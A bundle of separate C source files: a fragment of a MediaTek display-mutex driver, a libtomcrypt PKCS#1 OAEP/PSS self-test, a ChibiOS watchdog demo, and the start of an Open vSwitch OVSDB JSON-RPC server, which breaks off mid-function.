[DDP_COMPONENT_COLOR1] = MT2712_MUTEX_MOD_DISP_COLOR1, [DDP_COMPONENT_OD0] = MT2712_MUTEX_MOD_DISP_OD0, [DDP_COMPONENT_OD1] = MT2712_MUTEX_MOD2_DISP_OD1, [DDP_COMPONENT_OVL0] = MT2712_MUTEX_MOD_DISP_OVL0, [DDP_COMPONENT_OVL1] = MT2712_MUTEX_MOD_DISP_OVL1, [DDP_COMPONENT_PWM0] = MT2712_MUTEX_MOD_DISP_PWM0, [DDP_COMPONENT_PWM1] = MT2712_MUTEX_MOD_DISP_PWM1, [DDP_COMPONENT_PWM2] = MT2712_MUTEX_MOD_DISP_PWM2, [DDP_COMPONENT_RDMA0] = MT2712_MUTEX_MOD_DISP_RDMA0, [DDP_COMPONENT_RDMA1] = MT2712_MUTEX_MOD_DISP_RDMA1, [DDP_COMPONENT_RDMA2] = MT2712_MUTEX_MOD_DISP_RDMA2, [DDP_COMPONENT_UFOE] = MT2712_MUTEX_MOD_DISP_UFOE, [DDP_COMPONENT_WDMA0] = MT2712_MUTEX_MOD_DISP_WDMA0, [DDP_COMPONENT_WDMA1] = MT2712_MUTEX_MOD_DISP_WDMA1, }; static const unsigned int mt8173_mutex_mod[DDP_COMPONENT_ID_MAX] = { [DDP_COMPONENT_AAL0] = MT8173_MUTEX_MOD_DISP_AAL, [DDP_COMPONENT_COLOR0] = MT8173_MUTEX_MOD_DISP_COLOR0, [DDP_COMPONENT_COLOR1] = MT8173_MUTEX_MOD_DISP_COLOR1, [DDP_COMPONENT_GAMMA] = MT8173_MUTEX_MOD_DISP_GAMMA, [DDP_COMPONENT_OD0] = MT8173_MUTEX_MOD_DISP_OD, [DDP_COMPONENT_OVL0] = MT8173_MUTEX_MOD_DISP_OVL0, [DDP_COMPONENT_OVL1] = MT8173_MUTEX_MOD_DISP_OVL1, [DDP_COMPONENT_PWM0] = MT8173_MUTEX_MOD_DISP_PWM0, [DDP_COMPONENT_PWM1] = MT8173_MUTEX_MOD_DISP_PWM1, [DDP_COMPONENT_RDMA0] = MT8173_MUTEX_MOD_DISP_RDMA0, [DDP_COMPONENT_RDMA1] = MT8173_MUTEX_MOD_DISP_RDMA1, [DDP_COMPONENT_RDMA2] = MT8173_MUTEX_MOD_DISP_RDMA2, [DDP_COMPONENT_UFOE] = MT8173_MUTEX_MOD_DISP_UFOE, [DDP_COMPONENT_WDMA0] = MT8173_MUTEX_MOD_DISP_WDMA0, [DDP_COMPONENT_WDMA1] = MT8173_MUTEX_MOD_DISP_WDMA1, }; static const unsigned int mt2712_mutex_sof[DDP_MUTEX_SOF_DSI3 + 1] = { [DDP_MUTEX_SOF_SINGLE_MODE] = MUTEX_SOF_SINGLE_MODE, [DDP_MUTEX_SOF_DSI0] = MUTEX_SOF_DSI0, [DDP_MUTEX_SOF_DSI1] = MUTEX_SOF_DSI1, [DDP_MUTEX_SOF_DPI0] = MUTEX_SOF_DPI0, [DDP_MUTEX_SOF_DPI1] = MUTEX_SOF_DPI1, [DDP_MUTEX_SOF_DSI2] = MUTEX_SOF_DSI2, [DDP_MUTEX_SOF_DSI3] = MUTEX_SOF_DSI3, }; static const struct mtk_ddp_data mt2701_ddp_driver_data = { .mutex_mod = mt2701_mutex_mod, .mutex_sof = mt2712_mutex_sof, .mutex_mod_reg = MT2701_DISP_MUTEX0_MOD0, .mutex_sof_reg = MT2701_DISP_MUTEX0_SOF0, }; static const struct mtk_ddp_data mt2712_ddp_driver_data = { .mutex_mod = mt2712_mutex_mod, .mutex_sof = mt2712_mutex_sof, .mutex_mod_reg = MT2701_DISP_MUTEX0_MOD0, .mutex_sof_reg = MT2701_DISP_MUTEX0_SOF0, }; static const struct mtk_ddp_data mt8173_ddp_driver_data = { .mutex_mod = mt8173_mutex_mod, .mutex_sof = mt2712_mutex_sof, .mutex_mod_reg = MT2701_DISP_MUTEX0_MOD0, .mutex_sof_reg = MT2701_DISP_MUTEX0_SOF0, }; struct mtk_disp_mutex *mtk_disp_mutex_get(struct device *dev, unsigned int id) { struct mtk_ddp *ddp = dev_get_drvdata(dev); if (id >= 10) return ERR_PTR(-EINVAL); if (ddp->mutex[id].claimed) return ERR_PTR(-EBUSY); ddp->mutex[id].claimed = true; return &ddp->mutex[id]; } void mtk_disp_mutex_put(struct mtk_disp_mutex *mutex) { struct mtk_ddp *ddp = container_of(mutex, struct mtk_ddp, mutex[mutex->id]); WARN_ON(&ddp->mutex[mutex->id] != mutex); mutex->claimed = false; } int mtk_disp_mutex_prepare(struct mtk_disp_mutex *mutex) { struct mtk_ddp *ddp = container_of(mutex, struct mtk_ddp, mutex[mutex->id]); return clk_prepare_enable(ddp->clk); } void mtk_disp_mutex_unprepare(struct mtk_disp_mutex *mutex) { struct mtk_ddp *ddp = container_of(mutex, struct mtk_ddp, mutex[mutex->id]); clk_disable_unprepare(ddp->clk); } void mtk_disp_mutex_add_comp(struct mtk_disp_mutex *mutex, enum mtk_ddp_comp_id id) { struct mtk_ddp *ddp = container_of(mutex, struct mtk_ddp, mutex[mutex->id]); 
unsigned int reg; unsigned int sof_id; unsigned int offset; WARN_ON(&ddp->mutex[mutex->id] != mutex); switch (id) { case DDP_COMPONENT_DSI0: sof_id = DDP_MUTEX_SOF_DSI0; break; case DDP_COMPONENT_DSI1: sof_id = DDP_MUTEX_SOF_DSI0; break; case DDP_COMPONENT_DSI2: sof_id = DDP_MUTEX_SOF_DSI2; break; case DDP_COMPONENT_DSI3: sof_id = DDP_MUTEX_SOF_DSI3; break; case DDP_COMPONENT_DPI0: sof_id = DDP_MUTEX_SOF_DPI0; break; case DDP_COMPONENT_DPI1: sof_id = DDP_MUTEX_SOF_DPI1; break; default: if (ddp->data->mutex_mod[id] < 32) { offset = DISP_REG_MUTEX_MOD(ddp->data->mutex_mod_reg, mutex->id); reg = readl_relaxed(ddp->regs + offset); reg |= 1 << ddp->data->mutex_mod[id]; writel_relaxed(reg, ddp->regs + offset); } else { offset = DISP_REG_MUTEX_MOD2(mutex->id); reg = readl_relaxed(ddp->regs + offset); reg |= 1 << (ddp->data->mutex_mod[id] - 32); writel_relaxed(reg, ddp->regs + offset); } return; } writel_relaxed(ddp->data->mutex_sof[sof_id], ddp->regs + DISP_REG_MUTEX_SOF(ddp->data->mutex_sof_reg, mutex->id)); } void mtk_disp_mutex_remove_comp(struct mtk_disp_mutex *mutex, enum mtk_ddp_comp_id id) { struct mtk_ddp *ddp = container_of(mutex, struct mtk_ddp, mutex[mutex->id]); unsigned int reg; unsigned int offset; WARN_ON(&ddp->mutex[mutex->id] != mutex); switch (id) { case DDP_COMPONENT_DSI0: case DDP_COMPONENT_DSI1: case DDP_COMPONENT_DSI2: case DDP_COMPONENT_DSI3: case DDP_COMPONENT_DPI0: case DDP_COMPONENT_DPI1: writel_relaxed(MUTEX_SOF_SINGLE_MODE, ddp->regs + DISP_REG_MUTEX_SOF(ddp->data->mutex_sof_reg, mutex->id)); break; default: if (ddp->data->mutex_mod[id] < 32) { offset = DISP_REG_MUTEX_MOD(ddp->data->mutex_mod_reg, mutex->id); reg = readl_relaxed(ddp->regs + offset); reg &= ~(1 << ddp->data->mutex_mod[id]); writel_relaxed(reg, ddp->regs + offset); } else { offset = DISP_REG_MUTEX_MOD2(mutex->id); reg = readl_relaxed(ddp->regs + offset); reg &= ~(1 << (ddp->data->mutex_mod[id] - 32)); writel_relaxed(reg, ddp->regs + offset); } break; } } void mtk_disp_mutex_enable(struct mtk_disp_mutex *mutex) { struct mtk_ddp *ddp = container_of(mutex, struct mtk_ddp, mutex[mutex->id]); WARN_ON(&ddp->mutex[mutex->id] != mutex); writel(1, ddp->regs + DISP_REG_MUTEX_EN(mutex->id)); } void mtk_disp_mutex_disable(struct mtk_disp_mutex *mutex) { struct mtk_ddp *ddp = container_of(mutex, struct mtk_ddp, mutex[mutex->id]); WARN_ON(&ddp->mutex[mutex->id] != mutex); writel(0, ddp->regs + DISP_REG_MUTEX_EN(mutex->id)); } void mtk_disp_mutex_acquire(struct mtk_disp_mutex *mutex) { struct mtk_ddp *ddp = container_of(mutex, struct mtk_ddp, mutex[mutex->id]); u32 tmp; writel(1, ddp->regs + DISP_REG_MUTEX_EN(mutex->id)); writel(1, ddp->regs + DISP_REG_MUTEX(mutex->id)); if (readl_poll_timeout_atomic(ddp->regs + DISP_REG_MUTEX(mutex->id), tmp, tmp & INT_MUTEX, 1, 10000)) pr_err("could not acquire mutex %d\n", mutex->id); } void mtk_disp_mutex_release(struct mtk_disp_mutex *mutex) { struct mtk_ddp *ddp = container_of(mutex, struct mtk_ddp, mutex[mutex->id]); writel(0, ddp->regs + DISP_REG_MUTEX(mutex->id)); } static int mtk_ddp_probe(struct platform_device *pdev) { struct device *dev = &pdev->dev; struct mtk_ddp *ddp; struct resource *regs; int i; ddp = devm_kzalloc(dev, sizeof(*ddp), GFP_KERNEL); if (!ddp) return -ENOMEM; for (i = 0; i < 10; i++) ddp->mutex[i].id = i; ddp->data = of_device_get_match_data(dev); if (!ddp->data->no_clk) { ddp->clk = devm_clk_get(dev, NULL); if (IS_ERR(ddp->clk)) { if (PTR_ERR(ddp->clk) != -EPROBE_DEFER) dev_err(dev, "Failed to get clock\n"); return PTR_ERR(ddp->clk); } } regs = 
platform_get_resource(pdev, IORESOURCE_MEM, 0); ddp->regs = devm_ioremap_resource(dev, regs); if (IS_ERR(ddp->regs)) { dev_err(dev, "Failed to map mutex registers\n"); return PTR_ERR(ddp->regs); } platform_set_drvdata(pdev, ddp); return 0; } static int mtk_ddp_remove(struct platform_device *pdev) { return 0; } static const struct of_device_id ddp_driver_dt_match[] = { { .compatible = "mediatek,mt2701-disp-mutex", .data = &mt2701_ddp_driver_data}, { .compatible = "mediatek,mt2712-disp-mutex", .data = &mt2712_ddp_driver_data}, { .compatible = "mediatek,mt8173-disp-mutex", .data = &mt8173_ddp_driver_data}, {}, }; MODULE_DEVICE_TABLE(of, ddp_driver_dt_match); struct platform_driver mtk_ddp_driver = { .probe = mtk_ddp_probe, .remove = mtk_ddp_remove, .driver = { .name = "mediatek-ddp", .owner = THIS_MODULE, .of_match_table = ddp_driver_dt_match, }, };
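/*
 * Illustrative sketch (not part of the driver): how a mutex MOD bit index
 * maps onto the two MOD registers, as done inline in
 * mtk_disp_mutex_add_comp() and mtk_disp_mutex_remove_comp() above.
 * Indices below 32 land in DISP_REG_MUTEX_MOD; larger indices go to
 * DISP_REG_MUTEX_MOD2 with the index rebased by 32.
 */
static void mtk_mutex_mod_bit_sketch(const struct mtk_ddp *ddp, int mutex_id,
				     unsigned int mod, unsigned int *offset,
				     u32 *mask)
{
	if (mod < 32) {
		*offset = DISP_REG_MUTEX_MOD(ddp->data->mutex_mod_reg,
					     mutex_id);
		*mask = 1 << mod;
	} else {
		*offset = DISP_REG_MUTEX_MOD2(mutex_id);
		*mask = 1 << (mod - 32);
	}
}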
570791.c
#include <tomcrypt_test.h> #ifdef LTC_PKCS_1 int pkcs_1_test(void) { unsigned char buf[3][128]; int res1, res2, res3, prng_idx, hash_idx, err; unsigned long x, y, l1, l2, l3, i1, i2, lparamlen, saltlen, modlen; static const unsigned char lparam[] = { 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16 }; /* get hash/prng */ hash_idx = find_hash("sha1"); prng_idx = find_prng("yarrow"); if (hash_idx == -1 || prng_idx == -1) { fprintf(stderr, "pkcs_1 tests require sha1/yarrow"); return 1; } srand(time(NULL)); /* do many tests */ for (x = 0; x < 100; x++) { zeromem(buf, sizeof(buf)); /* make a dummy message (of random length) */ l3 = (rand() & 31) + 8; for (y = 0; y < l3; y++) buf[0][y] = rand() & 255; /* pick a random lparam len [0..16] */ lparamlen = abs(rand()) % 17; /* pick a random saltlen 0..16 */ saltlen = abs(rand()) % 17; /* LTC_PKCS #1 v2.0 supports modlens not multiple of 8 */ modlen = 800 + (abs(rand()) % 224); /* encode it */ l1 = sizeof(buf[1]); DO(pkcs_1_oaep_encode(buf[0], l3, lparam, lparamlen, modlen, &yarrow_prng, prng_idx, hash_idx, buf[1], &l1)); /* decode it */ l2 = sizeof(buf[2]); DO(pkcs_1_oaep_decode(buf[1], l1, lparam, lparamlen, modlen, hash_idx, buf[2], &l2, &res1)); if (res1 != 1 || l2 != l3 || memcmp(buf[2], buf[0], l3) != 0) { fprintf(stderr, "Outsize == %lu, should have been %lu, res1 = %d, lparamlen = %lu, msg contents follow.\n", l2, l3, res1, lparamlen); fprintf(stderr, "ORIGINAL:\n"); for (x = 0; x < l3; x++) { fprintf(stderr, "%02x ", buf[0][x]); } fprintf(stderr, "\nRESULT:\n"); for (x = 0; x < l2; x++) { fprintf(stderr, "%02x ", buf[2][x]); } fprintf(stderr, "\n\n"); return 1; } /* test PSS */ l1 = sizeof(buf[1]); DO(pkcs_1_pss_encode(buf[0], l3, saltlen, &yarrow_prng, prng_idx, hash_idx, modlen, buf[1], &l1)); DO(pkcs_1_pss_decode(buf[0], l3, buf[1], l1, saltlen, hash_idx, modlen, &res1)); buf[0][i1 = abs(rand()) % l3] ^= 1; DO(pkcs_1_pss_decode(buf[0], l3, buf[1], l1, saltlen, hash_idx, modlen, &res2)); buf[0][i1] ^= 1; buf[1][i2 = abs(rand()) % (l1 - 1)] ^= 1; pkcs_1_pss_decode(buf[0], l3, buf[1], l1, saltlen, hash_idx, modlen, &res3); if (!(res1 == 1 && res2 == 0 && res3 == 0)) { fprintf(stderr, "PSS failed: %d, %d, %d, %lu, %lu\n", res1, res2, res3, l3, saltlen); return 1; } } return 0; } #else int pkcs_1_test(void) { fprintf(stderr, "NOP"); return 0; } #endif /* $Source: /cvs/libtom/libtomcrypt/testprof/pkcs_1_test.c,v $ */ /* $Revision: 1.8 $ */ /* $Date: 2007/05/12 14:32:35 $ */
913796.c
/*
    ChibiOS - Copyright (C) 2016..2018 Theodore Ateba

    Licensed under the Apache License, Version 2.0 (the "License");
    you may not use this file except in compliance with the License.
    You may obtain a copy of the License at

        http://www.apache.org/licenses/LICENSE-2.0

    Unless required by applicable law or agreed to in writing, software
    distributed under the License is distributed on an "AS IS" BASIS,
    WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
    See the License for the specific language governing permissions and
    limitations under the License.
*/

#include "ch.h"
#include "hal.h"
#include "chprintf.h"

BaseSequentialStream *chp = (BaseSequentialStream *) &SD1;

/*
 * Watchdog deadline set to one second.
 */
static const WDGConfig wdgcfg = {
  false,            /* WDT uses period mode, set true for window mode. */
  WDT_PER_1KCLK_gc, /* Normal timeout period of 1 second.              */
  WDT_WPER_1KCLK_gc /* Closed timeout period of 1 second.              */
};

/*
 * Application entry point.
 */
int main(void) {

  /*
   * System initializations.
   * - HAL initialization, this also initializes the configured device drivers
   *   and performs the board-specific initializations.
   * - Kernel initialization, the main() function becomes a thread and the
   *   RTOS is active.
   */
  halInit();
  chSysInit();

  /*
   * Configure TX (PIN3) and RX (PIN2) on port C for the USART1.
   */
  palSetPadMode(IOPORT3, PIN3, PAL_MODE_OUTPUT_PUSHPULL);
  palSetPadMode(IOPORT3, PIN2, PAL_MODE_INPUT_PULLUP);

  /*
   * Start the Serial driver 1.
   */
  sdStart(&SD1, NULL);

  /*
   * Starting the watchdog driver.
   */
  wdgStart(&WDTD1, &wdgcfg);
  chprintf(chp, "Watchdog driver test program.\r\n");

  /*
   * Normal main() thread activity: it resets the watchdog.
   */
  while (TRUE) {
    chprintf(chp, "Watchdog reset by software.\r\n");
    wdgReset(&WDTD1); // TODO: rebuild with this line commented out.
                      // That shows whether the board is being rebooted
                      // by the watchdog.
    palTogglePad(IOPORT5, PORTE_LED);
    chThdSleepMilliseconds(500); // Use, for example, a 2 second delay to see
                                 // the watchdog reset the board every second.
  }
  return 0;
}
128079.c
/* Copyright (c) 2009, 2010 Nicira Networks * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at: * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ #include <config.h> #include "jsonrpc-server.h" #include <assert.h> #include <errno.h> #include "bitmap.h" #include "column.h" #include "json.h" #include "jsonrpc.h" #include "ovsdb-error.h" #include "ovsdb-parser.h" #include "ovsdb.h" #include "reconnect.h" #include "row.h" #include "stream.h" #include "table.h" #include "timeval.h" #include "transaction.h" #include "trigger.h" #include "vlog.h" VLOG_DEFINE_THIS_MODULE(ovsdb_jsonrpc_server); struct ovsdb_jsonrpc_remote; struct ovsdb_jsonrpc_session; /* Message rate-limiting. */ struct vlog_rate_limit rl = VLOG_RATE_LIMIT_INIT(1, 5); /* Sessions. */ static struct ovsdb_jsonrpc_session *ovsdb_jsonrpc_session_create( struct ovsdb_jsonrpc_remote *, struct jsonrpc_session *); static void ovsdb_jsonrpc_session_run_all(struct ovsdb_jsonrpc_remote *); static void ovsdb_jsonrpc_session_wait_all(struct ovsdb_jsonrpc_remote *); static void ovsdb_jsonrpc_session_close_all(struct ovsdb_jsonrpc_remote *); static void ovsdb_jsonrpc_session_reconnect_all(struct ovsdb_jsonrpc_remote *); static void ovsdb_jsonrpc_session_set_all_options( struct ovsdb_jsonrpc_remote *, const struct ovsdb_jsonrpc_options *); static void ovsdb_jsonrpc_session_get_status( const struct ovsdb_jsonrpc_remote *, struct shash *); /* Triggers. */ static void ovsdb_jsonrpc_trigger_create(struct ovsdb_jsonrpc_session *, struct json *id, struct json *params); static struct ovsdb_jsonrpc_trigger *ovsdb_jsonrpc_trigger_find( struct ovsdb_jsonrpc_session *, const struct json *id, size_t hash); static void ovsdb_jsonrpc_trigger_complete(struct ovsdb_jsonrpc_trigger *); static void ovsdb_jsonrpc_trigger_complete_all(struct ovsdb_jsonrpc_session *); static void ovsdb_jsonrpc_trigger_complete_done( struct ovsdb_jsonrpc_session *); /* Monitors. */ static struct json *ovsdb_jsonrpc_monitor_create( struct ovsdb_jsonrpc_session *, struct json *params); static struct jsonrpc_msg *ovsdb_jsonrpc_monitor_cancel( struct ovsdb_jsonrpc_session *, struct json_array *params, const struct json *request_id); static void ovsdb_jsonrpc_monitor_remove_all(struct ovsdb_jsonrpc_session *); /* JSON-RPC database server. */ struct ovsdb_jsonrpc_server { struct ovsdb *db; unsigned int n_sessions, max_sessions; struct shash remotes; /* Contains "struct ovsdb_jsonrpc_remote *"s. */ }; /* A configured remote. This is either a passive stream listener plus a list * of the currently connected sessions, or a list of exactly one active * session. */ struct ovsdb_jsonrpc_remote { struct ovsdb_jsonrpc_server *server; struct pstream *listener; /* Listener, if passive. */ struct list sessions; /* List of "struct ovsdb_jsonrpc_session"s. 
*/ }; static struct ovsdb_jsonrpc_remote *ovsdb_jsonrpc_server_add_remote( struct ovsdb_jsonrpc_server *, const char *name); static void ovsdb_jsonrpc_server_del_remote(struct shash_node *); struct ovsdb_jsonrpc_server * ovsdb_jsonrpc_server_create(struct ovsdb *db) { struct ovsdb_jsonrpc_server *server = xzalloc(sizeof *server); server->db = db; server->max_sessions = 64; shash_init(&server->remotes); return server; } void ovsdb_jsonrpc_server_destroy(struct ovsdb_jsonrpc_server *svr) { struct shash_node *node, *next; SHASH_FOR_EACH_SAFE (node, next, &svr->remotes) { ovsdb_jsonrpc_server_del_remote(node); } shash_destroy(&svr->remotes); free(svr); } struct ovsdb_jsonrpc_options * ovsdb_jsonrpc_default_options(void) { struct ovsdb_jsonrpc_options *options = xzalloc(sizeof *options); options->probe_interval = RECONNECT_DEFAULT_PROBE_INTERVAL; options->max_backoff = RECONNECT_DEFAULT_MAX_BACKOFF; return options; } /* Sets 'svr''s current set of remotes to the names in 'new_remotes', with * options in the struct ovsdb_jsonrpc_options supplied as the data values. * * A remote is an active or passive stream connection method, e.g. "pssl:" or * "tcp:1.2.3.4". */ void ovsdb_jsonrpc_server_set_remotes(struct ovsdb_jsonrpc_server *svr, const struct shash *new_remotes) { struct shash_node *node, *next; SHASH_FOR_EACH_SAFE (node, next, &svr->remotes) { if (!shash_find(new_remotes, node->name)) { ovsdb_jsonrpc_server_del_remote(node); } } SHASH_FOR_EACH (node, new_remotes) { const struct ovsdb_jsonrpc_options *options = node->data; struct ovsdb_jsonrpc_remote *remote; remote = shash_find_data(&svr->remotes, node->name); if (!remote) { remote = ovsdb_jsonrpc_server_add_remote(svr, node->name); if (!remote) { continue; } } ovsdb_jsonrpc_session_set_all_options(remote, options); } } static struct ovsdb_jsonrpc_remote * ovsdb_jsonrpc_server_add_remote(struct ovsdb_jsonrpc_server *svr, const char *name) { struct ovsdb_jsonrpc_remote *remote; struct pstream *listener; int error; error = jsonrpc_pstream_open(name, &listener); if (error && error != EAFNOSUPPORT) { VLOG_ERR_RL(&rl, "%s: listen failed: %s", name, strerror(error)); return NULL; } remote = xmalloc(sizeof *remote); remote->server = svr; remote->listener = listener; list_init(&remote->sessions); shash_add(&svr->remotes, name, remote); if (!listener) { ovsdb_jsonrpc_session_create(remote, jsonrpc_session_open(name)); } return remote; } static void ovsdb_jsonrpc_server_del_remote(struct shash_node *node) { struct ovsdb_jsonrpc_remote *remote = node->data; ovsdb_jsonrpc_session_close_all(remote); pstream_close(remote->listener); shash_delete(&remote->server->remotes, node); free(remote); } void ovsdb_jsonrpc_server_get_remote_status(const struct ovsdb_jsonrpc_server *svr, struct shash *statuses) { struct shash_node *node; shash_init(statuses); SHASH_FOR_EACH (node, &svr->remotes) { const struct ovsdb_jsonrpc_remote *remote = node->data; ovsdb_jsonrpc_session_get_status(remote, statuses); } } /* Forces all of the JSON-RPC sessions managed by 'svr' to disconnect and * reconnect. 
*/ void ovsdb_jsonrpc_server_reconnect(struct ovsdb_jsonrpc_server *svr) { struct shash_node *node; SHASH_FOR_EACH (node, &svr->remotes) { struct ovsdb_jsonrpc_remote *remote = node->data; ovsdb_jsonrpc_session_reconnect_all(remote); } } void ovsdb_jsonrpc_server_run(struct ovsdb_jsonrpc_server *svr) { struct shash_node *node; SHASH_FOR_EACH (node, &svr->remotes) { struct ovsdb_jsonrpc_remote *remote = node->data; if (remote->listener && svr->n_sessions < svr->max_sessions) { struct stream *stream; int error; error = pstream_accept(remote->listener, &stream); if (!error) { struct jsonrpc_session *js; js = jsonrpc_session_open_unreliably(jsonrpc_open(stream)); ovsdb_jsonrpc_session_create(remote, js); } else if (error != EAGAIN) { VLOG_WARN_RL(&rl, "%s: accept failed: %s", pstream_get_name(remote->listener), strerror(error)); } } ovsdb_jsonrpc_session_run_all(remote); } } void ovsdb_jsonrpc_server_wait(struct ovsdb_jsonrpc_server *svr) { struct shash_node *node; SHASH_FOR_EACH (node, &svr->remotes) { struct ovsdb_jsonrpc_remote *remote = node->data; if (remote->listener && svr->n_sessions < svr->max_sessions) { pstream_wait(remote->listener); } ovsdb_jsonrpc_session_wait_all(remote); } } /* JSON-RPC database server session. */ struct ovsdb_jsonrpc_session { struct ovsdb_jsonrpc_remote *remote; struct list node; /* Element in remote's sessions list. */ /* Triggers. */ struct hmap triggers; /* Hmap of "struct ovsdb_jsonrpc_trigger"s. */ struct list completions; /* Completed triggers. */ /* Monitors. */ struct hmap monitors; /* Hmap of "struct ovsdb_jsonrpc_monitor"s. */ /* Network connectivity. */ struct jsonrpc_session *js; /* JSON-RPC session. */ unsigned int js_seqno; /* Last jsonrpc_session_get_seqno() value. */ }; static void ovsdb_jsonrpc_session_close(struct ovsdb_jsonrpc_session *); static int ovsdb_jsonrpc_session_run(struct ovsdb_jsonrpc_session *); static void ovsdb_jsonrpc_session_wait(struct ovsdb_jsonrpc_session *); static void ovsdb_jsonrpc_session_set_options( struct ovsdb_jsonrpc_session *, const struct ovsdb_jsonrpc_options *); static void ovsdb_jsonrpc_session_got_request(struct ovsdb_jsonrpc_session *, struct jsonrpc_msg *); static void ovsdb_jsonrpc_session_got_notify(struct ovsdb_jsonrpc_session *, struct jsonrpc_msg *); static struct ovsdb_jsonrpc_session * ovsdb_jsonrpc_session_create(struct ovsdb_jsonrpc_remote *remote, struct jsonrpc_session *js) { struct ovsdb_jsonrpc_session *s; s = xzalloc(sizeof *s); s->remote = remote; list_push_back(&remote->sessions, &s->node); hmap_init(&s->triggers); hmap_init(&s->monitors); list_init(&s->completions); s->js = js; s->js_seqno = jsonrpc_session_get_seqno(js); remote->server->n_sessions++; return s; } static void ovsdb_jsonrpc_session_close(struct ovsdb_jsonrpc_session *s) { ovsdb_jsonrpc_monitor_remove_all(s); jsonrpc_session_close(s->js); list_remove(&s->node); s->remote->server->n_sessions--; free(s); } static int ovsdb_jsonrpc_session_run(struct ovsdb_jsonrpc_session *s) { jsonrpc_session_run(s->js); if (s->js_seqno != jsonrpc_session_get_seqno(s->js)) { s->js_seqno = jsonrpc_session_get_seqno(s->js); ovsdb_jsonrpc_trigger_complete_all(s); ovsdb_jsonrpc_monitor_remove_all(s); } ovsdb_jsonrpc_trigger_complete_done(s); if (!jsonrpc_session_get_backlog(s->js)) { struct jsonrpc_msg *msg = jsonrpc_session_recv(s->js); if (msg) { if (msg->type == JSONRPC_REQUEST) { ovsdb_jsonrpc_session_got_request(s, msg); } else if (msg->type == JSONRPC_NOTIFY) { ovsdb_jsonrpc_session_got_notify(s, msg); } else { VLOG_WARN("%s: received 
unexpected %s message", jsonrpc_session_get_name(s->js), jsonrpc_msg_type_to_string(msg->type)); jsonrpc_session_force_reconnect(s->js); jsonrpc_msg_destroy(msg); } } } return jsonrpc_session_is_alive(s->js) ? 0 : ETIMEDOUT; } static void ovsdb_jsonrpc_session_set_options(struct ovsdb_jsonrpc_session *session, const struct ovsdb_jsonrpc_options *options) { jsonrpc_session_set_max_backoff(session->js, options->max_backoff); jsonrpc_session_set_probe_interval(session->js, options->probe_interval); } static void ovsdb_jsonrpc_session_run_all(struct ovsdb_jsonrpc_remote *remote) { struct ovsdb_jsonrpc_session *s, *next; LIST_FOR_EACH_SAFE (s, next, node, &remote->sessions) { int error = ovsdb_jsonrpc_session_run(s); if (error) { ovsdb_jsonrpc_session_close(s); } } } static void ovsdb_jsonrpc_session_wait(struct ovsdb_jsonrpc_session *s) { jsonrpc_session_wait(s->js); if (!jsonrpc_session_get_backlog(s->js)) { jsonrpc_session_recv_wait(s->js); } } static void ovsdb_jsonrpc_session_wait_all(struct ovsdb_jsonrpc_remote *remote) { struct ovsdb_jsonrpc_session *s; LIST_FOR_EACH (s, node, &remote->sessions) { ovsdb_jsonrpc_session_wait(s); } } static void ovsdb_jsonrpc_session_close_all(struct ovsdb_jsonrpc_remote *remote) { struct ovsdb_jsonrpc_session *s, *next; LIST_FOR_EACH_SAFE (s, next, node, &remote->sessions) { ovsdb_jsonrpc_session_close(s); } } /* Forces all of the JSON-RPC sessions managed by 'remote' to disconnect and * reconnect. */ static void ovsdb_jsonrpc_session_reconnect_all(struct ovsdb_jsonrpc_remote *remote) { struct ovsdb_jsonrpc_session *s, *next; LIST_FOR_EACH_SAFE (s, next, node, &remote->sessions) { jsonrpc_session_force_reconnect(s->js); if (!jsonrpc_session_is_alive(s->js)) { ovsdb_jsonrpc_session_close(s); } } } /* Sets the options for all of the JSON-RPC sessions managed by 'remote' to * 'options'. */ static void ovsdb_jsonrpc_session_set_all_options( struct ovsdb_jsonrpc_remote *remote, const struct ovsdb_jsonrpc_options *options) { struct ovsdb_jsonrpc_session *s; LIST_FOR_EACH (s, node, &remote->sessions) { ovsdb_jsonrpc_session_set_options(s, options); } } static void ovsdb_jsonrpc_session_get_status(const struct ovsdb_jsonrpc_remote *remote, struct shash *shash) { const struct ovsdb_jsonrpc_session *s; const struct jsonrpc_session *js; const char *name; struct ovsdb_jsonrpc_remote_status *status; struct reconnect_stats rstats; /* We only look at the first session in the list. There should be only one * node in the list for outbound connections. We don't track status for * each individual inbound connection if someone configures the DB that * way. Since outbound connections are the norm, this is fine. */ if (list_is_empty(&remote->sessions)) { return; } s = CONTAINER_OF(remote->sessions.next, struct ovsdb_jsonrpc_session, node); js = s->js; if (!js) { return; } name = jsonrpc_session_get_name(js); status = xzalloc(sizeof *status); shash_add(shash, name, status); status->is_connected = jsonrpc_session_is_connected(js); status->last_error = jsonrpc_session_get_status(js); jsonrpc_session_get_reconnect_stats(js, &rstats); status->state = rstats.state; status->sec_since_connect = rstats.msec_since_connect == UINT_MAX ? UINT_MAX : rstats.msec_since_connect / 1000; status->sec_since_disconnect = rstats.msec_since_disconnect == UINT_MAX ? 
UINT_MAX : rstats.msec_since_disconnect / 1000; return; } static const char * get_db_name(const struct ovsdb_jsonrpc_session *s) { return s->remote->server->db->schema->name; } static struct jsonrpc_msg * ovsdb_jsonrpc_check_db_name(const struct ovsdb_jsonrpc_session *s, const struct jsonrpc_msg *request) { struct json_array *params; const char *want_db_name; const char *have_db_name; struct ovsdb_error *error; struct jsonrpc_msg *reply; params = json_array(request->params); if (!params->n || params->elems[0]->type != JSON_STRING) { error = ovsdb_syntax_error( request->params, NULL, "%s request params must begin with <db-name>", request->method); goto error; } want_db_name = params->elems[0]->u.string; have_db_name = get_db_name(s); if (strcmp(want_db_name, have_db_name)) { error = ovsdb_syntax_error( request->params, "unknown database", "%s request specifies unknown database %s", request->method, want_db_name); goto error; } return NULL; error: reply = jsonrpc_create_reply(ovsdb_error_to_json(error), request->id); ovsdb_error_destroy(error); return reply; } static struct jsonrpc_msg * execute_transaction(struct ovsdb_jsonrpc_session *s, struct jsonrpc_msg *request) { ovsdb_jsonrpc_trigger_create(s, request->id, request->params); request->id = NULL; request->params = NULL; jsonrpc_msg_destroy(request); return NULL; } static void ovsdb_jsonrpc_session_got_request(struct ovsdb_jsonrpc_session *s, struct jsonrpc_msg *request) { struct jsonrpc_msg *reply; if (!strcmp(request->method, 